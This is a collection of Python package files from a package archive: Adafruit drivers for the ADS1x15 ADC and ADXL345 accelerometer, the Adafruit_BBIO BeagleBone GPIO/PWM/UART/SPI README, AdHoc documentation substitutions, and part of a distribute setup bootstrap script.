.. |adhoc_include| replace:: |@:|\ ``adhoc_include``\ |:@|
.. |adhoc_verbatim| replace:: |@:|\ ``adhoc_verbatim``\ |:@|
.. |adhoc_compiled| replace:: |@:|\ ``adhoc_compiled``\ |:@|
.. |adhoc_enable| replace:: |@:|\ ``adhoc_enable``\ |:@|
.. |adhoc_disable| replace:: |@:|\ ``adhoc_disable``\ |:@|
.. |adhoc_template| replace:: |@:|\ ``adhoc_template``\ |:@|
.. |adhoc_template_v| replace:: |@:|\ ``adhoc_template_v``\ |:@|
.. |adhoc_uncomment| replace:: |@:|\ ``adhoc_uncomment``\ |:@|
.. |adhoc_indent| replace:: |@:|\ ``adhoc_indent``\ |:@|
.. |adhoc_import| replace:: |@:|\ ``adhoc_import``\ |:@|
.. |adhoc_unpack| replace:: |@:|\ ``adhoc_unpack``\ |:@|
.. |adhoc_remove| replace:: |@:|\ ``adhoc_remove``\ |:@|
.. |adhoc_remove_| replace:: |@:|\ ``adhoc_remove_``\ |:@|
.. |adhoc_run_time_class| replace:: |@:|\ ``adhoc_run_time_class``\ |:@|
.. |adhoc_run_time_section| replace:: |@:|\ ``adhoc_run_time_section``\ |:@|
.. |adhoc_run_time_engine| replace:: |@:|\ ``adhoc_run_time_engine``\ |:@|
.. |@m| replace:: ``@|:``
.. |m>| replace:: ``:|>``
.. |<m| replace:: ``<|:``
.. |m@| replace:: ``:|@``
.. |MACRO_NAME| replace:: |@m|\ ``MACRO_NAME``\ |m>|
.. |adhoc_macro_call| replace:: |<m|\ ``adhoc_macro_call``\ |m@|
.. |adhoc_macro_expansion| replace:: |<m|\ ``adhoc_macro_expansion``\ |m@|
| AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/doc/index.rst | index.rst |
import time
# Register and other configuration values:
ADS1x15_DEFAULT_ADDRESS = 0x48
ADS1x15_POINTER_CONVERSION = 0x00
ADS1x15_POINTER_CONFIG = 0x01
ADS1x15_POINTER_LOW_THRESHOLD = 0x02
ADS1x15_POINTER_HIGH_THRESHOLD = 0x03
ADS1x15_CONFIG_OS_SINGLE = 0x8000
ADS1x15_CONFIG_MUX_OFFSET = 12
# Maping of gain values to config register values.
ADS1x15_CONFIG_GAIN = {
2/3: 0x0000,
1: 0x0200,
2: 0x0400,
4: 0x0600,
8: 0x0800,
16: 0x0A00
}
ADS1x15_CONFIG_MODE_CONTINUOUS = 0x0000
ADS1x15_CONFIG_MODE_SINGLE = 0x0100
# Mapping of data/sample rate to config register values for ADS1015 (faster).
ADS1015_CONFIG_DR = {
128: 0x0000,
250: 0x0020,
490: 0x0040,
920: 0x0060,
1600: 0x0080,
2400: 0x00A0,
3300: 0x00C0
}
# Mapping of data/sample rate to config register values for ADS1115 (slower).
ADS1115_CONFIG_DR = {
8: 0x0000,
16: 0x0020,
32: 0x0040,
64: 0x0060,
128: 0x0080,
250: 0x00A0,
475: 0x00C0,
860: 0x00E0
}
ADS1x15_CONFIG_COMP_WINDOW = 0x0010
ADS1x15_CONFIG_COMP_ACTIVE_HIGH = 0x0008
ADS1x15_CONFIG_COMP_LATCHING = 0x0004
ADS1x15_CONFIG_COMP_QUE = {
1: 0x0000,
2: 0x0001,
4: 0x0002
}
ADS1x15_CONFIG_COMP_QUE_DISABLE = 0x0003
class ADS1x15(object):
"""Base functionality for ADS1x15 analog to digital converters."""
def __init__(self, address=ADS1x15_DEFAULT_ADDRESS, i2c=None, **kwargs):
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address, **kwargs)
def _data_rate_default(self):
"""Retrieve the default data rate for this ADC (in samples per second).
Should be implemented by subclasses.
"""
raise NotImplementedError('Subclasses must implement _data_rate_default!')
def _data_rate_config(self, data_rate):
"""Subclasses should override this function and return a 16-bit value
that can be OR'ed with the config register to set the specified
data rate. If a value of None is specified then a default data_rate
setting should be returned. If an invalid or unsupported data_rate is
provided then an exception should be thrown.
"""
raise NotImplementedError('Subclass must implement _data_rate_config function!')
def _conversion_value(self, low, high):
"""Subclasses should override this function that takes the low and high
byte of a conversion result and returns a signed integer value.
"""
raise NotImplementedError('Subclass must implement _conversion_value function!')
def _read(self, mux, gain, data_rate, mode):
"""Perform an ADC read with the provided mux, gain, data_rate, and mode
values. Returns the signed integer result of the read.
"""
config = ADS1x15_CONFIG_OS_SINGLE # Go out of power-down mode for conversion.
# Specify mux value.
config |= (mux & 0x07) << ADS1x15_CONFIG_MUX_OFFSET
# Validate the passed in gain and then set it in the config.
if gain not in ADS1x15_CONFIG_GAIN:
raise ValueError('Gain must be one of: 2/3, 1, 2, 4, 8, 16')
config |= ADS1x15_CONFIG_GAIN[gain]
# Set the mode (continuous or single shot).
config |= mode
# Get the default data rate if none is specified (default differs between
# ADS1015 and ADS1115).
if data_rate is None:
data_rate = self._data_rate_default()
# Set the data rate (this is controlled by the subclass as it differs
# between ADS1015 and ADS1115).
config |= self._data_rate_config(data_rate)
config |= ADS1x15_CONFIG_COMP_QUE_DISABLE # Disble comparator mode.
# Send the config value to start the ADC conversion.
# Explicitly break the 16-bit value down to a big endian pair of bytes.
self._device.writeList(ADS1x15_POINTER_CONFIG, [(config >> 8) & 0xFF, config & 0xFF])
# Wait for the ADC sample to finish based on the sample rate plus a
# small offset to be sure (0.1 millisecond).
time.sleep(1.0/data_rate+0.0001)
# Retrieve the result.
result = self._device.readList(ADS1x15_POINTER_CONVERSION, 2)
return self._conversion_value(result[1], result[0])
def _read_comparator(self, mux, gain, data_rate, mode, high_threshold,
low_threshold, active_low, traditional, latching,
num_readings):
"""Perform an ADC read with the provided mux, gain, data_rate, and mode
values and with the comparator enabled as specified. Returns the signed
integer result of the read.
"""
assert num_readings == 1 or num_readings == 2 or num_readings == 4, 'Num readings must be 1, 2, or 4!'
# Set high and low threshold register values.
self._device.writeList(ADS1x15_POINTER_HIGH_THRESHOLD, [(high_threshold >> 8) & 0xFF, high_threshold & 0xFF])
self._device.writeList(ADS1x15_POINTER_LOW_THRESHOLD, [(low_threshold >> 8) & 0xFF, low_threshold & 0xFF])
# Now build up the appropriate config register value.
config = ADS1x15_CONFIG_OS_SINGLE # Go out of power-down mode for conversion.
# Specify mux value.
config |= (mux & 0x07) << ADS1x15_CONFIG_MUX_OFFSET
# Validate the passed in gain and then set it in the config.
if gain not in ADS1x15_CONFIG_GAIN:
raise ValueError('Gain must be one of: 2/3, 1, 2, 4, 8, 16')
config |= ADS1x15_CONFIG_GAIN[gain]
# Set the mode (continuous or single shot).
config |= mode
# Get the default data rate if none is specified (default differs between
# ADS1015 and ADS1115).
if data_rate is None:
data_rate = self._data_rate_default()
# Set the data rate (this is controlled by the subclass as it differs
# between ADS1015 and ADS1115).
config |= self._data_rate_config(data_rate)
# Enable window mode if required.
if not traditional:
config |= ADS1x15_CONFIG_COMP_WINDOW
# Enable active high mode if required.
if not active_low:
config |= ADS1x15_CONFIG_COMP_ACTIVE_HIGH
# Enable latching mode if required.
if latching:
config |= ADS1x15_CONFIG_COMP_LATCHING
# Set number of comparator hits before alerting.
config |= ADS1x15_CONFIG_COMP_QUE[num_readings]
# Send the config value to start the ADC conversion.
# Explicitly break the 16-bit value down to a big endian pair of bytes.
self._device.writeList(ADS1x15_POINTER_CONFIG, [(config >> 8) & 0xFF, config & 0xFF])
# Wait for the ADC sample to finish based on the sample rate plus a
# small offset to be sure (0.1 millisecond).
time.sleep(1.0/data_rate+0.0001)
# Retrieve the result.
result = self._device.readList(ADS1x15_POINTER_CONVERSION, 2)
return self._conversion_value(result[1], result[0])
def read_adc(self, channel, gain=1, data_rate=None):
"""Read a single ADC channel and return the ADC value as a signed integer
result. Channel must be a value within 0-3.
"""
assert 0 <= channel <= 3, 'Channel must be a value within 0-3!'
# Perform a single shot read and set the mux value to the channel plus
# the highest bit (bit 3) set.
return self._read(channel + 0x04, gain, data_rate, ADS1x15_CONFIG_MODE_SINGLE)
def read_adc_difference(self, differential, gain=1, data_rate=None):
"""Read the difference between two ADC channels and return the ADC value
as a signed integer result. Differential must be one of:
- 0 = Channel 0 minus channel 1
- 1 = Channel 0 minus channel 3
- 2 = Channel 1 minus channel 3
- 3 = Channel 2 minus channel 3
"""
assert 0 <= differential <= 3, 'Differential must be a value within 0-3!'
# Perform a single shot read using the provided differential value
# as the mux value (which will enable differential mode).
return self._read(differential, gain, data_rate, ADS1x15_CONFIG_MODE_SINGLE)
def start_adc(self, channel, gain=1, data_rate=None):
"""Start continuous ADC conversions on the specified channel (0-3). Will
return an initial conversion result, then call the get_last_result()
function to read the most recent conversion result. Call stop_adc() to
stop conversions.
"""
assert 0 <= channel <= 3, 'Channel must be a value within 0-3!'
# Start continuous reads and set the mux value to the channel plus
# the highest bit (bit 3) set.
return self._read(channel + 0x04, gain, data_rate, ADS1x15_CONFIG_MODE_CONTINUOUS)
def start_adc_difference(self, differential, gain=1, data_rate=None):
"""Start continuous ADC conversions between two ADC channels. Differential
must be one of:
- 0 = Channel 0 minus channel 1
- 1 = Channel 0 minus channel 3
- 2 = Channel 1 minus channel 3
- 3 = Channel 2 minus channel 3
Will return an initial conversion result, then call the get_last_result()
function continuously to read the most recent conversion result. Call
stop_adc() to stop conversions.
"""
assert 0 <= differential <= 3, 'Differential must be a value within 0-3!'
# Perform a single shot read using the provided differential value
# as the mux value (which will enable differential mode).
return self._read(differential, gain, data_rate, ADS1x15_CONFIG_MODE_CONTINUOUS)
def start_adc_comparator(self, channel, high_threshold, low_threshold,
gain=1, data_rate=None, active_low=True,
traditional=True, latching=False, num_readings=1):
"""Start continuous ADC conversions on the specified channel (0-3) with
the comparator enabled. When enabled the comparator to will check if
the ADC value is within the high_threshold & low_threshold value (both
should be signed 16-bit integers) and trigger the ALERT pin. The
behavior can be controlled by the following parameters:
- active_low: Boolean that indicates if ALERT is pulled low or high
when active/triggered. Default is true, active low.
- traditional: Boolean that indicates if the comparator is in traditional
mode where it fires when the value is within the threshold,
or in window mode where it fires when the value is _outside_
the threshold range. Default is true, traditional mode.
- latching: Boolean that indicates if the alert should be held until
get_last_result() is called to read the value and clear
the alert. Default is false, non-latching.
- num_readings: The number of readings that match the comparator before
triggering the alert. Can be 1, 2, or 4. Default is 1.
Will return an initial conversion result, then call the get_last_result()
function continuously to read the most recent conversion result. Call
stop_adc() to stop conversions.
"""
assert 0 <= channel <= 3, 'Channel must be a value within 0-3!'
# Start continuous reads with comparator and set the mux value to the
# channel plus the highest bit (bit 3) set.
return self._read_comparator(channel + 0x04, gain, data_rate,
ADS1x15_CONFIG_MODE_CONTINUOUS,
high_threshold, low_threshold, active_low,
traditional, latching, num_readings)
def start_adc_difference_comparator(self, differential, high_threshold, low_threshold,
gain=1, data_rate=None, active_low=True,
traditional=True, latching=False, num_readings=1):
"""Start continuous ADC conversions between two channels with
the comparator enabled. See start_adc_difference for valid differential
parameter values and their meaning. When enabled the comparator to will
check if the ADC value is within the high_threshold & low_threshold value
(both should be signed 16-bit integers) and trigger the ALERT pin. The
behavior can be controlled by the following parameters:
- active_low: Boolean that indicates if ALERT is pulled low or high
when active/triggered. Default is true, active low.
- traditional: Boolean that indicates if the comparator is in traditional
mode where it fires when the value is within the threshold,
or in window mode where it fires when the value is _outside_
the threshold range. Default is true, traditional mode.
- latching: Boolean that indicates if the alert should be held until
get_last_result() is called to read the value and clear
the alert. Default is false, non-latching.
- num_readings: The number of readings that match the comparator before
triggering the alert. Can be 1, 2, or 4. Default is 1.
Will return an initial conversion result, then call the get_last_result()
function continuously to read the most recent conversion result. Call
stop_adc() to stop conversions.
"""
assert 0 <= differential <= 3, 'Differential must be a value within 0-3!'
# Start continuous reads with comparator and set the mux value to the
# channel plus the highest bit (bit 3) set.
return self._read_comparator(differential, gain, data_rate,
ADS1x15_CONFIG_MODE_CONTINUOUS,
high_threshold, low_threshold, active_low,
traditional, latching, num_readings)
def stop_adc(self):
"""Stop all continuous ADC conversions (either normal or difference mode).
"""
# Set the config register to its default value of 0x8583 to stop
# continuous conversions.
config = 0x8583
self._device.writeList(ADS1x15_POINTER_CONFIG, [(config >> 8) & 0xFF, config & 0xFF])
def get_last_result(self):
"""Read the last conversion result when in continuous conversion mode.
Will return a signed integer value.
"""
# Retrieve the conversion register value, convert to a signed int, and
# return it.
result = self._device.readList(ADS1x15_POINTER_CONVERSION, 2)
return self._conversion_value(result[1], result[0])
class ADS1115(ADS1x15):
"""ADS1115 16-bit analog to digital converter instance."""
def __init__(self, *args, **kwargs):
super(ADS1115, self).__init__(*args, **kwargs)
def _data_rate_default(self):
# Default from datasheet page 16, config register DR bit default.
return 128
def _data_rate_config(self, data_rate):
if data_rate not in ADS1115_CONFIG_DR:
raise ValueError('Data rate must be one of: 8, 16, 32, 64, 128, 250, 475, 860')
return ADS1115_CONFIG_DR[data_rate]
def _conversion_value(self, low, high):
# Convert to 16-bit signed value.
value = ((high & 0xFF) << 8) | (low & 0xFF)
# Check for sign bit and turn into a negative value if set.
if value & 0x8000 != 0:
value -= 1 << 16
return value
class ADS1015(ADS1x15):
"""ADS1015 12-bit analog to digital converter instance."""
def __init__(self, *args, **kwargs):
super(ADS1015, self).__init__(*args, **kwargs)
def _data_rate_default(self):
# Default from datasheet page 19, config register DR bit default.
return 1600
def _data_rate_config(self, data_rate):
if data_rate not in ADS1015_CONFIG_DR:
raise ValueError('Data rate must be one of: 128, 250, 490, 920, 1600, 2400, 3300')
return ADS1015_CONFIG_DR[data_rate]
def _conversion_value(self, low, high):
# Convert to 12-bit signed value.
value = ((high & 0xFF) << 4) | ((low & 0xFF) >> 4)
# Check for sign bit and turn into a negative value if set.
if value & 0x800 != 0:
value -= 1 << 12
return value | Adafruit-ADS1x15 | /Adafruit_ADS1x15-1.0.2.tar.gz/Adafruit_ADS1x15-1.0.2/Adafruit_ADS1x15/ADS1x15.py | ADS1x15.py |
import struct
# Minimal constants carried over from Arduino library
ADXL345_ADDRESS = 0x53
ADXL345_REG_DEVID = 0x00 # Device ID
ADXL345_REG_DATAX0 = 0x32 # X-axis data 0 (6 bytes for X/Y/Z)
ADXL345_REG_POWER_CTL = 0x2D # Power-saving features control
ADXL345_REG_DATA_FORMAT = 0x31
ADXL345_REG_BW_RATE = 0x2C
ADXL345_DATARATE_0_10_HZ = 0x00
ADXL345_DATARATE_0_20_HZ = 0x01
ADXL345_DATARATE_0_39_HZ = 0x02
ADXL345_DATARATE_0_78_HZ = 0x03
ADXL345_DATARATE_1_56_HZ = 0x04
ADXL345_DATARATE_3_13_HZ = 0x05
ADXL345_DATARATE_6_25HZ = 0x06
ADXL345_DATARATE_12_5_HZ = 0x07
ADXL345_DATARATE_25_HZ = 0x08
ADXL345_DATARATE_50_HZ = 0x09
ADXL345_DATARATE_100_HZ = 0x0A # (default)
ADXL345_DATARATE_200_HZ = 0x0B
ADXL345_DATARATE_400_HZ = 0x0C
ADXL345_DATARATE_800_HZ = 0x0D
ADXL345_DATARATE_1600_HZ = 0x0E
ADXL345_DATARATE_3200_HZ = 0x0F
ADXL345_RANGE_2_G = 0x00 # +/- 2g (default)
ADXL345_RANGE_4_G = 0x01 # +/- 4g
ADXL345_RANGE_8_G = 0x02 # +/- 8g
ADXL345_RANGE_16_G = 0x03 # +/- 16g
class ADXL345(object):
"""ADXL345 triple-axis accelerometer."""
def __init__(self, address=ADXL345_ADDRESS, i2c=None, **kwargs):
"""Initialize the ADXL345 accelerometer using its I2C interface.
"""
# Setup I2C interface for the device.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address, **kwargs)
# Check that the acclerometer is connected, then enable it.
if self._device.readU8(ADXL345_REG_DEVID) == 0xE5:
self._device.write8(ADXL345_REG_POWER_CTL, 0x08)
else:
raise RuntimeError('Failed to find the expected device ID register value, check your wiring.')
def set_range(self, value):
"""Set the range of the accelerometer to the provided value. Range value
should be one of these constants:
- ADXL345_RANGE_2_G = +/-2G
- ADXL345_RANGE_4_G = +/-4G
- ADXL345_RANGE_8_G = +/-8G
- ADXL345_RANGE_16_G = +/-16G
"""
# Read the data format register to preserve bits. Update the data
# rate, make sure that the FULL-RES bit is enabled for range scaling
format_reg = self._device.readU8(ADXL345_REG_DATA_FORMAT) & ~0x0F
format_reg |= value
format_reg |= 0x08 # FULL-RES bit enabled
# Write the updated format register.
self._device.write8(ADXL345_REG_DATA_FORMAT, format_reg)
def get_range(self):
"""Retrieve the current range of the accelerometer. See set_range for
the possible range constant values that will be returned.
"""
return self._device.readU8(ADXL345_REG_DATA_FORMAT) & 0x03
def set_data_rate(self, rate):
"""Set the data rate of the aceelerometer. Rate should be one of the
following constants:
- ADXL345_DATARATE_0_10_HZ = 0.1 hz
- ADXL345_DATARATE_0_20_HZ = 0.2 hz
- ADXL345_DATARATE_0_39_HZ = 0.39 hz
- ADXL345_DATARATE_0_78_HZ = 0.78 hz
- ADXL345_DATARATE_1_56_HZ = 1.56 hz
- ADXL345_DATARATE_3_13_HZ = 3.13 hz
- ADXL345_DATARATE_6_25HZ = 6.25 hz
- ADXL345_DATARATE_12_5_HZ = 12.5 hz
- ADXL345_DATARATE_25_HZ = 25 hz
- ADXL345_DATARATE_50_HZ = 50 hz
- ADXL345_DATARATE_100_HZ = 100 hz
- ADXL345_DATARATE_200_HZ = 200 hz
- ADXL345_DATARATE_400_HZ = 400 hz
- ADXL345_DATARATE_800_HZ = 800 hz
- ADXL345_DATARATE_1600_HZ = 1600 hz
- ADXL345_DATARATE_3200_HZ = 3200 hz
"""
# Note: The LOW_POWER bits are currently ignored,
# we always keep the device in 'normal' mode
self._device.write8(ADXL345_REG_BW_RATE, rate & 0x0F)
def get_data_rate(self):
"""Retrieve the current data rate. See set_data_rate for the possible
data rate constant values that will be returned.
"""
return self._device.readU8(ADXL345_REG_BW_RATE) & 0x0F
def read(self):
"""Read the current value of the accelerometer and return it as a tuple
of signed 16-bit X, Y, Z axis values.
"""
raw = self._device.readList(ADXL345_REG_DATAX0, 6)
return struct.unpack('<hhh', raw) | Adafruit-ADXL345 | /Adafruit_ADXL345-1.0.1.tar.gz/Adafruit_ADXL345-1.0.1/Adafruit_ADXL345/ADXL345.py | ADXL345.py |
# Adafruit Beaglebone I/O Python API
[](http://adafruit-beaglebone-io-python.readthedocs.io/en/latest/?badge=latest)
[](https://badge.fury.io/py/Adafruit_BBIO)
[](https://pypi.python.org/pypi/Adafruit_BBIO/)
Adafruit BBIO is an API to enable [GPIO](README.md#gpio-setup), [PWM](README.md#pwm), [ADC](README.md#adc), [UART](README.md#uart), [SPI](README.md#spi) and [eQEP](README.md#eqep) (Quadrature Encoder) hardware access from Python applications running on the Beaglebone.
* It is recommended to use an [official BeagleBoard.org Debian image](https://beagleboard.org/latest-images)
* **Currently recommended image: [Debian 10.3 "Buster" IoT (2020-04-06)](http://beagleboard.org/latest-images)** _(default kernel is 4.19.x-ti)_
* Adafruit_BBIO supports Linux kernels 3.8 through 4.19
* New versions of Adafruit_BBIO may break backwards compatibility. Please read the [changelog](CHANGELOG.md).
* It is recommended to use Python 3
## Installation on Debian
Note: Follow the instructions on BeagleBoard.org to [get connected to the Internet](https://beagleboard.org/upgrade#connect)
**Easiest:**
```
sudo apt-get update
sudo apt-get install build-essential python3-dev python3-pip -y
sudo pip3 install Adafruit_BBIO
```
**Manual:**
```
sudo apt-get update
sudo apt-get install build-essential python3-dev python3-pip -y
git clone git://github.com/adafruit/adafruit-beaglebone-io-python.git
cd adafruit-beaglebone-io-python
sudo python3 setup.py install
```
Upgrade Adafruit_BBIO to latest version on [PyPI](https://pypi.python.org/pypi/Adafruit_BBIO):
```
sudo pip3 install --upgrade Adafruit_BBIO
```
## Usage
Using the library is very similar to the excellent RPi.GPIO library used on the Raspberry Pi. Below are some examples.
### Pin Numbers
Please note that there is no '0' prefix for the pin numbers. For example, pin 7 on header P8 is `P8_7`.
**Correct:**
```
GPIO.setup("P8_7", OUT )
```
**INCORRECT:**
```
GPIO.setup("P8_07", OUT )
```
Refer to `pins_t table[]` in [common.c](https://github.com/adafruit/adafruit-beaglebone-io-python/blob/master/source/common.c#L73) all the pin labels.
### config-pin
[config-pin](https://github.com/beagleboard/bb.org-overlays/tree/master/tools/beaglebone-universal-io) is now used on the official BeagleBoard.org Debian Jessie and Stretch images to control pin mode (e.g. pin mux).
```
debian@beaglebone:~$ config-pin -q P9_14
P9_14 Mode: pwm
debian@beaglebone:~$ config-pin -l P9_14
default gpio gpio_pu gpio_pd pwm
debian@beaglebone:~$ config-pin P9_14 gpio
debian@beaglebone:~$ config-pin -q P9_14
P9_14 Mode: gpio Direction: in Value: 0
debian@beaglebone:~$ config-pin P9_14 pwm
debian@beaglebone:~$ config-pin -q P9_14
P9_14 Mode: pwm
```
### GPIO Setup
Import the library, and setup as GPIO.OUT or GPIO.IN::
import Adafruit_BBIO.GPIO as GPIO
GPIO.setup("P8_14", GPIO.OUT)
You can also refer to the pin names::
GPIO.setup("GPIO0_26", GPIO.OUT)
### GPIO Output
Setup the pin for output, and write GPIO.HIGH or GPIO.LOW. Or you can use 1 or 0.::
import Adafruit_BBIO.GPIO as GPIO
GPIO.setup("P8_14", GPIO.OUT)
GPIO.output("P8_14", GPIO.HIGH)
### On-Board LEDs
On-board LEDs (USR0-USR3) are handled by LED class driver rather than the GPIO pin driver.
They have a different path in the /sys/ filesystem.
Setup the pin for output and write GPIO.HIGH or GPIO.LOW::
import Adafruit_BBIO.GPIO as GPIO
import time
for i in range(4):
GPIO.setup("USR%d" % i, GPIO.OUT)
while True:
for i in range(4):
GPIO.output("USR%d" % i, GPIO.HIGH)
time.sleep(1)
for i in range(4):
GPIO.output("USR%d" % i, GPIO.LOW)
time.sleep(1)
### GPIO Input
Inputs work similarly to outputs.:
import Adafruit_BBIO.GPIO as GPIO
GPIO.setup("P8_14", GPIO.IN)
Polling inputs:
if GPIO.input("P8_14"):
print("HIGH")
else:
print("LOW")
Waiting for an edge (GPIO.RISING, GPIO.FALLING, or GPIO.BOTH:
GPIO.wait_for_edge(channel, GPIO.RISING)
or
GPIO.wait_for_edge(channel, GPIO.RISING, timeout)
Detecting events:
GPIO.add_event_detect("P9_12", GPIO.FALLING)
#your amazing code here
#detect wherever:
if GPIO.event_detected("P9_12"):
print("event detected!")
### PWM
**The PWM Duty Cycle range was reversed in 0.0.15 from 100(off)-0(on) to 0(off)-100(on). Please update your code accordingly.**
import Adafruit_BBIO.PWM as PWM
#PWM.start(channel, duty, freq=2000, polarity=0)
#duty values are valid 0 (off) to 100 (on)
PWM.start("P9_14", 50)
PWM.set_duty_cycle("P9_14", 25.5)
PWM.set_frequency("P9_14", 10)
PWM.stop("P9_14")
PWM.cleanup()
#set polarity to 1 on start:
PWM.start("P9_14", 50, 2000, 1)
### ADC
import Adafruit_BBIO.ADC as ADC
ADC.setup()
#read returns values 0-1.0
value = ADC.read("P9_40")
#read_raw returns non-normalized value
value = ADC.read_raw("P9_40")
### [UART](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart)
* Use [`config-pin` to set pin mode](https://github.com/beagleboard/bb.org-overlays/tree/master/tools/beaglebone-universal-io) for [UART1 and UART2 pins](http://beagleboard.org/static/images/cape-headers-serial.png)
```
config-pin P9.21 uart # UART2_TXD
config-pin P9.22 uart # UART2_RXD
config-pin P9.24 uart # UART1_TXD
config-pin P9.26 uart # UART1_RXD
```
* [Install pyserial](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart#using-uart-with-python)
```
sudo pip install pyserial
```
* [Test UART1](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart#using-uart-with-python)
```
import Adafruit_BBIO.UART as UART
import serial
UART.setup("UART1")
with serial.Serial(port = "/dev/ttyO1", baudrate=9600) as ser:
print("Serial is open!")
ser.write(b"Hello World!")
```
* Available UART names on BeagleBone
* `UART1`: /dev/ttyO1, Rx: P9_26, Tx: P9_24
* `UART2`: /dev/ttyO2, Rx: P9_22, Tx: P9_21
* `UART4`: /dev/ttyO4, Rx: P9_11, Tx: P9_13
* `UART5`: /dev/ttyO5, Rx: P8_38, Tx: P8_37
* note: `UART5` requires `disable_uboot_overlay_video=1` in `/boot/uEnv.txt`
* Available UART names on PocketBeagle
* `PB-UART0`: /dev/ttyO0, Rx: P1_30, Tx: P1_32
* `PB-UART1`: /dev/ttyO1, Rx: P2_11, Tx: P2_09
* `PB-UART2`: /dev/ttyO2, Rx: P1_08, Tx: P1_10
* [Loopback test with UART1 and UART2](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart#testing-and-using-the-uart)
### [SPI](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/spi)
* Use [`config-pin` to set pin mode](https://github.com/beagleboard/bb.org-overlays/tree/master/tools/beaglebone-universal-io) for [SPI pins](http://beagleboard.org/static/images/cape-headers-spi.png)
* SPI0
* SPI0_CS0: `config-pin p9.17 spi_cs`
* SPI0_D0: `config-pin p9.21 spi`
* SPI0_D1: `config-pin p9.18 spi`
* SPI0_SCLK: `config-pin p9.22 spi_sclk`
* SPI1
* SPI1_CS0: `config-pin p9.20 spi_cs`
* SPI1_CS0: `config-pin p9.28 spi_cs`
* SPI1_CS1: `config-pin p9.19 spi_cs`
* SPI1_CS1: `config-pin p9.42 spi_cs`
* SPI1_D0: `config-pin p9.29 spi`
* SPI1_D1: `config-pin p9.30 spi`
* SPI1_SCLK: `config-pin p9.31 spi_sclk`
* Example:
```
from Adafruit_BBIO.SPI import SPI
#spi = SPI(bus, device) #/dev/spidev<bus>.<device>
# /dev/spidev0.0
spi = SPI(1,0)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
# /dev/spidev0.1
spi = SPI(1,1)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
# /dev/spidev1.0
spi = SPI(2,0)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
# /dev/spidev1.1
spi = SPI(2,1)
print(spi.xfer2([32, 11, 110, 22, 220]))
spi.close()
```
### eQEP
To use the enhanced Quadrature Encoder Pulse (eQEP) module, please refer to the [`Encoder` module's documentation](https://github.com/adafruit/adafruit-beaglebone-io-python/tree/master/Adafruit_BBIO#usage).
## Running tests
Install py.test to run the tests. You'll also need the python compiler package for pytest:
```
sudo pip3 install pytest
```
Execute the following in the root of the project:
```
pytest
```
NOTE: `sudo` should not be required as udev configures group ownership and permission for [GPIO](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/80-gpio-noroot.rules) and [PWM](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/81-pwm-noroot.rules)
## Reporting issues
When reporting issues, plesae run the following script which will print the system configuration:
```
sudo /opt/scripts/tools/version.sh
```
and paste the output in a reply.
This script should be present for any Debian or Ubunut image downloaded from:
https://beagleboard.org/ or https://rcn-ee.com/
## Credits
The BeagleBone IO Python library was originally forked from the excellent MIT Licensed [RPi.GPIO](https://code.google.com/p/raspberry-gpio-python) library written by Ben Croston.
## License
Written by Justin Cooper, Adafruit Industries. BeagleBone IO Python library is released under the MIT License.
| Adafruit-BBIO | /Adafruit_BBIO-1.2.0.tar.gz/Adafruit_BBIO-1.2.0/README.md | README.md |
import os
import shutil
import sys
import time
import fnmatch
import tempfile
import tarfile
import optparse
from distutils import log
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
try:
import subprocess
def _python_cmd(*args):
args = (sys.executable,) + args
return subprocess.call(args) == 0
except ImportError:
# will be used for python 2.3
def _python_cmd(*args):
args = (sys.executable,) + args
# quoting arguments if windows
if sys.platform == 'win32':
def quote(arg):
if ' ' in arg:
return '"%s"' % arg
return arg
args = [quote(arg) for arg in args]
return os.spawnl(os.P_WAIT, sys.executable, *args) == 0
DEFAULT_VERSION = "0.6.45"
DEFAULT_URL = "https://pypi.python.org/packages/source/d/distribute/"
SETUPTOOLS_FAKED_VERSION = "0.6c11"
SETUPTOOLS_PKG_INFO = """\
Metadata-Version: 1.0
Name: setuptools
Version: %s
Summary: xxxx
Home-page: xxx
Author: xxx
Author-email: xxx
License: xxx
Description: xxx
""" % SETUPTOOLS_FAKED_VERSION
def _install(tarball, install_args=()):
# extracting the tarball
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
tar = tarfile.open(tarball)
_extractall(tar)
tar.close()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
# installing
log.warn('Installing Distribute')
if not _python_cmd('setup.py', 'install', *install_args):
log.warn('Something went wrong during the installation.')
log.warn('See the error message above.')
# exitcode will be 2
return 2
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
def _build_egg(egg, tarball, to_dir):
# extracting the tarball
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
tar = tarfile.open(tarball)
_extractall(tar)
tar.close()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
# building an egg
log.warn('Building a Distribute egg in %s', to_dir)
_python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
# returning the result
log.warn(egg)
if not os.path.exists(egg):
raise IOError('Could not build the egg.')
def _do_download(version, download_base, to_dir, download_delay):
egg = os.path.join(to_dir, 'distribute-%s-py%d.%d.egg'
% (version, sys.version_info[0], sys.version_info[1]))
if not os.path.exists(egg):
tarball = download_setuptools(version, download_base,
to_dir, download_delay)
_build_egg(egg, tarball, to_dir)
sys.path.insert(0, egg)
import setuptools
setuptools.bootstrap_install_from = egg
